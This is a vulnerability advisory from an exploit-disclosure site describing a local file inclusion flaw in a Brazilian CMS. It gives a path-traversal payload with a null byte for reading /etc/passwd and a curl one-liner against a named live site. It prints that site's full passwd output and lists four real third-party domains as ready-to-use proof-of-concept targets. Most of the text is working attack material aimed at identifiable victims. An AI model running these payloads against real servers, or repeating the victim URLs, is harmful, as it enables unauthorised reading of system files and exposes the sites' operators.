CMS NETGEAR powered by PICTOR Local File Inclusion

2016-12-15 / 2016-12-16
Credit: Felipe Andrian Peixoto
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

[+] Local File Inclusion on CMS NETGEAR powered by PICTOR [+] Date: 14/12/2016 [+] Risk: Medium [+] CWE number: CWE-98 [+] Author: Felipe Andrian Peixoto [+] Vendor Homepage: http://www.pictor.com.br/ [+] Contact: felipe_andrian@hotmail.com [+] Tested on: Gnu/Linux [+] Vulnerable File: index.php [+] Exploit : http://host/index.php?pag= [ Local File Inclusion ] [+] Payload : "../../../../../../../../../../../../../etc/passwd" [+] Example : felipe@andrian # echo "Local File Inclusion:";curl -s "http://acervocbncuritiba.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00" | grep :x Local File Inclusion: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin avahi-autoipd:x:499:499:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin vcsa:x:69:498:virtual console memory owner:/dev:/sbin/nologin rtkit:x:498:497:RealtimeKit:/proc:/sbin/nologin abrt:x:497:495::/etc/abrt:/sbin/nologin nscd:x:28:494:NSCD Daemon:/:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin avahi:x:496:491:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin haldaemon:x:68:490:HAL daemon:/:/sbin/nologin openvpn:x:495:489:OpenVPN:/etc/openvpn:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:488:Apache:/var/www:/sbin/nologin saslauth:x:494:487:"Saslauthd user":/var/empty/saslauth:/sbin/nologin mailnull:x:47:486::/var/spool/mqueue:/sbin/nologin smmsp:x:51:485::/var/spool/mqueue:/sbin/nologin nm-openconnect:x:493:484:NetworkManager user for OpenConnect:/:/sbin/nologin sshd:x:74:483:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin smolt:x:492:482:Smolt:/usr/share/smolt:/sbin/nologin pulse:x:491:481:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:479::/var/lib/gdm:/sbin/nologin pictor:x:500:500:Pictor Desenvolvimento:/home/pictor:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash webalizer:x:67:478:Webalizer:/var/www/usage:/sbin/nologin [+] PoC : http://acervocbncuritiba.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00 http://tecnopisos.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00 http://www.lucaldasbijoux.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00 http://qualysul.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top